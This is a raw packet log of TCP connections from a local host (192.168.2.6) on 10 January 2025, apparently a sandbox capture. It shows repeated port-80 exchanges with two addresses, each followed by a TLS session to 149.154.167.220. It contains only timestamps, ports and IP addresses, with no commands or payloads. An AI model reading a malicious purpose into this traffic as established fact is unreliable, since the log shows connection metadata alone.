                                                                                                                Jan 10, 2025 22:43:28.043473005 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.043487072 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.043556929 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.044400930 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.044452906 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.044487953 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.044761896 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.044828892 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.044836998 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.044867039 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.044893026 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:28.044897079 CET44349875172.217.18.97192.168.2.6
                                                                                                                Jan 10, 2025 22:43:28.044959068 CET49875443192.168.2.6172.217.18.97
                                                                                                                Jan 10, 2025 22:43:29.160641909 CET4991080192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:29.165496111 CET8049910132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:29.165622950 CET4991080192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:29.165944099 CET4991080192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:29.170871019 CET8049910132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:30.056500912 CET8049910132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:30.063294888 CET4991080192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:30.068085909 CET8049910132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:30.356193066 CET8049910132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:30.402571917 CET4991080192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:30.687593937 CET49921443192.168.2.6104.21.80.1
                                                                                                                Jan 10, 2025 22:43:30.687633991 CET44349921104.21.80.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:30.687896967 CET49921443192.168.2.6104.21.80.1
                                                                                                                Jan 10, 2025 22:43:30.689919949 CET49921443192.168.2.6104.21.80.1
                                                                                                                Jan 10, 2025 22:43:30.689929008 CET44349921104.21.80.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:31.170124054 CET44349921104.21.80.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:31.170222044 CET49921443192.168.2.6104.21.80.1
                                                                                                                Jan 10, 2025 22:43:31.173501968 CET49921443192.168.2.6104.21.80.1
                                                                                                                Jan 10, 2025 22:43:31.173518896 CET44349921104.21.80.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:31.173824072 CET44349921104.21.80.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:31.177674055 CET49921443192.168.2.6104.21.80.1
                                                                                                                Jan 10, 2025 22:43:31.223328114 CET44349921104.21.80.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:31.311913967 CET44349921104.21.80.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:31.311978102 CET44349921104.21.80.1192.168.2.6
                                                                                                                Jan 10, 2025 22:43:31.312216997 CET49921443192.168.2.6104.21.80.1
                                                                                                                Jan 10, 2025 22:43:31.318082094 CET49921443192.168.2.6104.21.80.1
                                                                                                                Jan 10, 2025 22:43:36.955414057 CET4991080192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:36.960405111 CET8049910132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:37.235462904 CET8049910132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:37.247426987 CET49964443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:37.247456074 CET44349964149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:37.247544050 CET49964443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:37.247997999 CET49964443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:37.248013020 CET44349964149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:37.277591944 CET4991080192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:37.867079973 CET44349964149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:37.867221117 CET49964443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:37.869036913 CET49964443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:37.869044065 CET44349964149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:37.869290113 CET44349964149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:37.871284962 CET49964443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:37.911324024 CET44349964149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:37.911425114 CET49964443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:37.911429882 CET44349964149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:38.290793896 CET44349964149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:38.290894032 CET44349964149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:38.290972948 CET49964443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:38.291693926 CET49964443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:38.451124907 CET4991080192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:38.452522993 CET4997380192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:38.457045078 CET8049910132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:38.457117081 CET4991080192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:38.457427025 CET8049973132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:38.457513094 CET4997380192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:38.457655907 CET4997380192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:38.462457895 CET8049973132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:39.295414925 CET8049973132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:39.296737909 CET49978443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:39.296792030 CET44349978149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:39.296860933 CET49978443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:39.297451973 CET49978443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:39.297466040 CET44349978149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:39.340074062 CET4997380192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:39.936533928 CET44349978149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:39.938317060 CET49978443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:39.938349962 CET44349978149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:39.938410044 CET49978443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:39.938420057 CET44349978149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:40.404019117 CET44349978149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:40.404150963 CET44349978149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:40.404213905 CET49978443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:40.404567003 CET49978443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:40.413561106 CET4998480192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:40.418354988 CET8049984132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:40.418411970 CET4998480192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:40.418509007 CET4998480192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:40.423214912 CET8049984132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:41.236248016 CET8049984132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:41.254303932 CET49989443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:41.254347086 CET44349989149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:41.254422903 CET49989443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:41.255556107 CET49989443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:41.255567074 CET44349989149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:41.298850060 CET4998480192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:41.884018898 CET44349989149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:41.885773897 CET49989443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:41.885806084 CET44349989149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:41.885855913 CET49989443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:41.885864973 CET44349989149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:42.193823099 CET44349989149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:42.193913937 CET44349989149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:42.193960905 CET49989443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:42.194334030 CET49989443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:42.197869062 CET4998480192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:42.198769093 CET4999180192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:42.202792883 CET8049984132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:42.202912092 CET4998480192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:42.203517914 CET8049991132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:42.203596115 CET4999180192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:42.203737974 CET4999180192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:42.208569050 CET8049991132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:43.095438004 CET8049991132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:43.096709967 CET49992443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:43.096749067 CET44349992149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:43.096812010 CET49992443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:43.097069979 CET49992443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:43.097080946 CET44349992149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:43.136930943 CET4999180192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:43.705277920 CET44349992149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:43.707042933 CET49992443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:43.707067013 CET44349992149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:43.707122087 CET49992443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:43.707129955 CET44349992149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:44.155710936 CET44349992149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:44.155795097 CET44349992149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:44.155838966 CET49992443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:44.156383991 CET49992443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:44.171066046 CET4999180192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:44.179528952 CET8049991132.226.8.169192.168.2.6
                                                                                                                Jan 10, 2025 22:43:44.179584026 CET4999180192.168.2.6132.226.8.169
                                                                                                                Jan 10, 2025 22:43:44.180701971 CET4999480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:44.185718060 CET8049994158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:44.185782909 CET4999480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:44.185894012 CET4999480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:44.191514969 CET8049994158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:44.751507044 CET8049994158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:44.752728939 CET49995443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:44.752787113 CET44349995149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:44.752847910 CET49995443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:44.753134012 CET49995443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:44.753149986 CET44349995149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:44.793167114 CET4999480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:45.358717918 CET44349995149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:45.360338926 CET49995443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:45.360364914 CET44349995149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:45.360423088 CET49995443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:45.360431910 CET44349995149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:45.707133055 CET44349995149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:45.707216024 CET44349995149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:45.707310915 CET49995443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:45.707762957 CET49995443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:45.710905075 CET4999480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:45.712021112 CET4999680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:45.715858936 CET8049994158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:45.716825008 CET8049996158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:45.716880083 CET4999480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:45.716914892 CET4999680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:45.717025042 CET4999680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:45.721740961 CET8049996158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:46.293987989 CET8049996158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:46.295105934 CET49997443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:46.295157909 CET44349997149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:46.295304060 CET49997443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:46.295514107 CET49997443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:46.295526028 CET44349997149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:46.340040922 CET4999680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:46.925349951 CET44349997149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:46.929960012 CET49997443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:46.929976940 CET44349997149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:46.930690050 CET49997443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:46.930696964 CET44349997149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:47.355704069 CET44349997149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:47.355792999 CET44349997149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:47.355864048 CET49997443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:47.356256962 CET49997443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:47.359370947 CET4999680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:47.360500097 CET4999880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:47.364511967 CET8049996158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:47.364597082 CET4999680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:47.367480993 CET8049998158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:47.367558002 CET4999880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:47.367672920 CET4999880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:47.373423100 CET8049998158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:47.962541103 CET8049998158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:47.964051008 CET49999443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:47.964092016 CET44349999149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:47.964176893 CET49999443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:47.964497089 CET49999443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:47.964509010 CET44349999149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:48.012039900 CET4999880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:48.569633007 CET44349999149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:48.571465015 CET49999443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:48.571484089 CET44349999149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:48.575460911 CET49999443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:48.575467110 CET44349999149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:48.810625076 CET44349999149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:48.810720921 CET44349999149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:48.810785055 CET49999443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:48.814169884 CET4999880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:48.815121889 CET5000080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:48.815484047 CET49999443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:48.819148064 CET8049998158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:48.819248915 CET4999880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:48.819909096 CET8050000158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:48.819973946 CET5000080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:48.821504116 CET5000080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:48.826215982 CET8050000158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:49.425270081 CET8050000158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:49.426760912 CET50001443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:49.426806927 CET44350001149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:49.426918030 CET50001443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:49.427200079 CET50001443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:49.427211046 CET44350001149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:49.465059996 CET5000080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:50.045056105 CET44350001149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:50.046787024 CET50001443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:50.046828032 CET44350001149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:50.046962976 CET50001443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:50.046969891 CET44350001149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:50.501811028 CET44350001149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:50.503794909 CET44350001149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:50.503880024 CET50001443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:50.560755968 CET50001443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:50.872953892 CET5000080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:50.874099016 CET5000280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:50.878036022 CET8050000158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:50.878091097 CET5000080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:50.878927946 CET8050002158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:50.878987074 CET5000280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:50.879101992 CET5000280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:50.883857012 CET8050002158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:51.652462006 CET8050002158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:51.653918982 CET50003443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:51.654028893 CET44350003149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:51.654124022 CET50003443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:51.654424906 CET50003443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:51.654499054 CET44350003149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:51.699425936 CET5000280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:52.275254011 CET44350003149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:52.276906967 CET50003443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:52.276954889 CET44350003149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:52.277031898 CET50003443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:52.277054071 CET44350003149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:52.514420033 CET44350003149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:52.514633894 CET44350003149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:52.514782906 CET50003443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:52.515053988 CET50003443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:52.518124104 CET5000280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:52.519093990 CET5000480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:52.523154974 CET8050002158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:52.523247957 CET5000280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:52.523942947 CET8050004158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:52.524003983 CET5000480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:52.524235964 CET5000480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:52.528978109 CET8050004158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.115761995 CET8050004158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.116991043 CET50005443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:53.117036104 CET44350005149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.117124081 CET50005443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:53.117373943 CET50005443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:53.117381096 CET44350005149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.168194056 CET5000480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:53.727142096 CET44350005149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.728758097 CET50005443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:53.728780031 CET44350005149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.728887081 CET50005443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:53.728897095 CET44350005149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.963613987 CET44350005149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.963804960 CET44350005149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.963864088 CET50005443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:53.964207888 CET50005443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:53.967912912 CET5000480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:53.969131947 CET5000680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:53.973958969 CET8050004158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.974010944 CET5000480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:53.974997044 CET8050006158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:53.975052118 CET5000680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:53.975125074 CET5000680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:53.980554104 CET8050006158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:54.536262989 CET8050006158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:54.537466049 CET50007443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:54.537508965 CET44350007149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:54.537817955 CET50007443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:54.538053989 CET50007443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:54.538063049 CET44350007149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:54.590090036 CET5000680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:55.171391964 CET44350007149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:55.172949076 CET50007443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:55.172966957 CET44350007149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:55.173190117 CET50007443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:55.173196077 CET44350007149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:55.399924994 CET44350007149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:55.400100946 CET44350007149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:55.400151014 CET50007443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:55.400526047 CET50007443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:55.403404951 CET5000680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:55.404561043 CET5000880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:55.408437967 CET8050006158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:55.408555984 CET5000680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:55.409415960 CET8050008158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:55.409478903 CET5000880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:55.409564018 CET5000880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:55.414362907 CET8050008158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:56.009612083 CET8050008158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:56.021743059 CET50009443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:56.021846056 CET44350009149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:56.021940947 CET50009443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:56.025136948 CET50009443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:56.025170088 CET44350009149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:56.058799982 CET5000880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:56.648751020 CET44350009149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:56.652030945 CET50009443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:56.652066946 CET44350009149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:56.652132988 CET50009443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:56.652148962 CET44350009149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:56.922820091 CET44350009149.154.167.220192.168.2.6
